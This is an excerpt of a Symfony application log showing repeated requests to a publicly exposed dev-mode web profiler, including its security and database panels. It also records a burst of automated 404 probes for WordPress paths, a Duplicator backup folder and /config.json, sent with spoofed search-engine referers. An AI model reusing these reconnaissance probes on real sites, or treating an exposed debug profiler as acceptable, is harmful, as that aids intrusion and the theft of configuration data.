  9792. [2025-12-21 04:14:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24?panel=security","method":"GET"} []
  9793. [2025-12-21 04:14:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9794. [2025-12-21 04:16:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=twig","method":"GET"} []
  9795. [2025-12-21 04:16:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9796. [2025-12-21 04:16:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=db","method":"GET"} []
  9797. [2025-12-21 04:16:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9798. [2025-12-21 04:19:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"13ecbf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/13ecbf","method":"GET"} []
  9799. [2025-12-21 04:19:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9800. [2025-12-21 04:20:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4d61bf","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4d61bf?panel=logger","method":"GET"} []
  9801. [2025-12-21 04:20:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9802. [2025-12-21 04:21:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
  9803. [2025-12-21 04:21:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
  9804. [2025-12-21 04:24:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=security","method":"GET"} []
  9805. [2025-12-21 04:24:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9806. [2025-12-21 04:25:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
  9807. [2025-12-21 04:25:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&method=GET","method":"GET"} []
  9808. [2025-12-21 04:26:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  9809. [2025-12-21 04:27:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9810. [2025-12-21 04:30:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c9887","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/0c9887","method":"GET"} []
  9811. [2025-12-21 04:30:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  9812. [2025-12-21 04:31:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=cache","method":"GET"} []
  9813. [2025-12-21 04:31:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9814. [2025-12-21 04:32:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9815. [2025-12-21 04:32:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9816. [2025-12-21 04:32:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9817. [2025-12-21 04:32:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9818. [2025-12-21 04:32:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9819. [2025-12-21 04:32:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9820. [2025-12-21 04:32:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9821. [2025-12-21 04:32:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9822. [2025-12-21 04:32:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9823. [2025-12-21 04:32:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9824. [2025-12-21 04:32:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9825. [2025-12-21 04:32:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9826. [2025-12-21 04:32:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9827. [2025-12-21 04:32:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9828. [2025-12-21 04:33:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9829. [2025-12-21 04:33:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9830. [2025-12-21 04:33:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9831. [2025-12-21 04:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9832. [2025-12-21 04:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9833. [2025-12-21 04:33:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9834. [2025-12-21 04:33:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9835. [2025-12-21 04:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2","method":"GET"} []
  9836. [2025-12-21 04:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  9837. [2025-12-21 04:39:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=logger","method":"GET"} []
  9838. [2025-12-21 04:39:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9839. [2025-12-21 04:39:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"69e5c4","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/69e5c4?panel=form","method":"GET"} []
  9840. [2025-12-21 04:39:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  9841. [2025-12-21 04:39:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9842. [2025-12-21 04:39:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9843. [2025-12-21 04:39:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9844. [2025-12-21 04:40:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=security","method":"GET"} []
  9845. [2025-12-21 04:40:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9846. [2025-12-21 04:44:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.12&limit=10","method":"GET"} []
  9847. [2025-12-21 04:44:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.12&limit=10","method":"GET"} []
  9848. [2025-12-21 04:45:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3a51f9","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3a51f9/search/results?limit=10&method=GET","method":"GET"} []
  9849. [2025-12-21 04:45:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9850. [2025-12-21 04:49:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=request","method":"GET"} []
  9851. [2025-12-21 04:49:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9852. [2025-12-21 04:51:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=exception","method":"GET"} []
  9853. [2025-12-21 04:51:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9854. [2025-12-21 04:52:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9855. [2025-12-21 04:52:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=request","method":"GET"} []
  9856. [2025-12-21 04:52:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9857. [2025-12-21 04:52:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
